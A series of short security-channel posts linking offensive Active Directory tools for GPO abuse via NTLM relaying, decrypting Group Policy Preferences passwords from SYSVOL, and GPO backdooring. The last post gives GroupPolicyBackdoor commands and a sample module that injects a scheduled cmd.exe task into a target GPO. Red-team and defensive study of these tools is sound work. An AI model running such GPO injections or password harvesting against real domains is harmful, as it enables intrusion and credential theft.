🔄 Active Directory GPOs through NTLM relaying, and more!
Learn about an attack vector that exploits GPOs through NTLM relaying, potentially allowing unauthenticated attackers to abuse.
🌐 Source:
https://www.synacktiv.com/publications/gpoddity-exploiting-active-directory-gpos-through-ntlm-relaying-and-more
#ad #gpo #relay #ntlm
📜 DGPOEdit
Disconnected GPO Editor - A Group Policy Manager launcher to allow editing of domain GPOs from non-domain joined machines
🔗 Source:
https://github.com/CCob/DGPOEdit
#ad #windows #gpo #policy
GitHub
GitHub - CCob/DRSAT: Disconnected RSAT - A method of running Group Policy Manager, Certificate Authority and Certificate Templates…
Disconnected RSAT - A method of running Group Policy Manager, Certificate Authority and Certificate Templates MMC snap-ins from non-domain joined machines - CCob/DRSAT
A cross-platform tool to find and decrypt Group Policy Preferences passwords from the SYSVOL share using low-privileged domain accounts.
🚀 Features:
— Only requires a low-privileged domain user account.
— Automatically gets the list of all domain controllers from the LDAP.
— Finds all the Group Policy Preferences Passwords present in SYSVOL share on each domain controller.
— Decrypts the passwords and prints them in cleartext.
— Outputs to an Excel file.
🔗 Source:
https://github.com/p0dalirius/FindGPPPasswords
#ad #windows #gpo #credentials
Forwarded from Whitehat Lab
GitHub
GitHub - synacktiv/GroupPolicyBackdoor: Group Policy Objects manipulation and exploitation framework
Group Policy Objects manipulation and exploitation framework - synacktiv/GroupPolicyBackdoor
A post-exploitation tool for various GPO manipulations. Written in
First presented at DEFCON 33
Examples:
#backup
python3 gpb.py restore backup -d 'corp.com' -o './my_backups' --dc ad01-dc.corp.com -u 'john' -p 'Password1!' -n 'TARGET_GPO'
#inject
python3 gpb.py gpo inject --domain 'corp.com' --dc 'ad01-dc.corp.com' -k --module modules_templates/ImmediateTask_create.ini --gpo-name 'TARGET_GPO'
Example ini:
[MODULECONFIG]
name = Scheduled Tasks
type = computer
[MODULEOPTIONS]
task_type = immediate
program = cmd.exe
arguments = /c "whoami > C:\Temp\poc.txt"
[MODULEFILTERS]
filters =
    [{
        "operator": "AND",
        "type": "Computer Name",
        "value": "ad01-srv1.corp.com"
    }]
GPO creation, deletion, backup and injections
Various injectable configurations, with, for each, customizable options (see list in the wiki)
Possibility to remove injected configurations from the target GPO
Possibility to revert the actions performed on client devices
GPO links manipulation
GPO enumeration / user privileges enumeration on GPOs
#gpo #redteam #windows